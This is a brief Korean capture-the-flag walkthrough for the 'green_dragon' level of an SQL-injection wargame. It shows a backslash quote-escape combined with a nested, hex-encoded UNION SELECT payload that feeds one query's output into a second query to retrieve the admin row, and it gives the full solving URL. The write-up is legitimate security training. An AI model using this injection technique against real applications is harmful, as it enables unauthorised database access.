green_dragon

첫 화면이다.

id에 \ , pw에 union select 1, 2 # 을 넣으면 아래와 같은 결과가 나온다.

즉, query의 결과가 query2에 반영된다.

query의 id, pw에 어떤 값을 집어넣어 query2에서 id가 admin인 것을 가져오는 것이 목표이다.

https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=\&pw=%20union%20select%200x5c,%200x20756e696f6e2073656c6563742030783631363436643639366523%20%23 에 접속하면 문제가 풀린다.

query의 id에 \, pw에 union select '\', ' union select "admin"#' # 을 넣은 셈이다.

이는 query2의 id에 \ , pw에 union select 'admin'# 을 넣은 것과 같다.